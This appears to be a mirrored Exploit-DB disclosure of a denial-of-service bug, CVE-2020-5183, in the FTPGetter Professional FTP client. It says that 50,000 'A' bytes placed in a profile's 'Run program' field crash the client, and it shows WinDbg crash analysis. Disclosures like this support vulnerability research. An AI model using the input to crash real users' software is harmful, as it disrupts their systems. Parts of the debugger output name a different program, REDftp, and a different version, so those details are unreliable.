FTPGetter Professional 5.97.0.223 – Denial of Service (PoC)

• Exploit Database
• 124 阅读

• 作者： FULLSHADE
  日期： 2020-01-06
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47871/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154

  # Exploit Title: FTPGetter Professional 5.97.0.223 -Denial of Service (PoC) # Google Dork: N/A # Date: 2020-01-03 # Exploit Author: FULLSHADE # Vendor Homepage: https://www.ftpgetter.com/ # Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe # Version: v.5.97.0.223 # Tested on: Windows 7 # CVE : N/A   ================================================================== THE BUG : NULL pointer dereference -> DOS crash ==================================================================   The FTPGetter Professional v.5.97.0.223 FTP client suffers from a NULL pointer dereference vulnerability via the program not properly handling user input when setting the field "Run program" under profile properties, it triggers when executing the profile.   ================================================================== DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183 ================================================================== ... ... ================================================================== WINDBG ANALYSIS AFTER SENDING 50,000 &apos;A&apos; BYTES ==================================================================   (b84.e88): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001 eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 *** ERROR: Symbol file could not be found.Defaulted to export symbols for FTPGetter.exe - FTPGetter!Xtermforminitialization$qqrv+0x202d74: 00855994 8b5004mov edx,dword ptr [eax+4] ds:0023:00000004=????????   0:000> !analyze -v ******************************************************************************* * * *Exception Analysis * * * *******************************************************************************   *** ERROR: Symbol file could not be found.Defaulted to export symbols for ftpgcore.dll - Failed calling InternetOpenUrl, GLE=12007   FAULTING_IP: FTPGetter!Xtermforminitialization$qqrv+202d74 00855994 8b5004mov edx,dword ptr [eax+4]   EXCEPTION_RECORD:ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 00000004 Attempt to read from address 00000004   FAULTING_THREAD:00000e88   PROCESS_NAME:FTPGetter.exe   ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.   EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.   EXCEPTION_PARAMETER1:00000000   EXCEPTION_PARAMETER2:00000004   READ_ADDRESS:00000004   FOLLOWUP_IP: FTPGetter!Xtermforminitialization$qqrv+202d74 00855994 8b5004mov edx,dword ptr [eax+4]   MOD_LIST: <ANALYSIS/>   NTGLOBALFLAG:0   APPLICATION_VERIFIER_FLAGS:0   BUGCHECK_STR:APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ   PRIMARY_PROBLEM_CLASS:NULL_CLASS_PTR_DEREFERENCE   DEFAULT_BUCKET_ID:NULL_CLASS_PTR_DEREFERENCE   LAST_CONTROL_TRANSFER:from 00812591 to 00855994   STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74 0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971 0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1 0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60 0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186 0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23 0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b 0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357 0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf 0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074 0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7 0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6 0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f 0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7 0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe 0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70 0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b   SYMBOL_STACK_INDEX:0   SYMBOL_NAME:ftpgetter!Xtermforminitialization$qqrv+202d74   FOLLOWUP_NAME:MachineOwner   MODULE_NAME: FTPGetter   IMAGE_NAME:FTPGetter.exe   DEBUG_FLR_IMAGE_TIMESTAMP:5dffa0bd   STACK_COMMAND:dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb   FAILURE_BUCKET_ID:NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv   BUCKET_ID:APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74   WATSON_STAGEONE_URL:http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1   Followup: MachineOwner ---------   NULL pointer   FOLLOWUP_IP: REDftp!Xtermforminitialization$qqrv+202d74 00855994 8b5004mov edx,dword ptr [eax+4]   Stepping into and running   eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000 eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0 nv up ei pl nz ac pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010216 REDftp!GetFTPValidationW+0x6e842: 004db97a 837a5400cmp dword ptr [edx+54h],0 ds:0023:41414195=????????   ================================================================== CVE-2020-5183 is a NULL pointer dereference vulnerability ==================================================================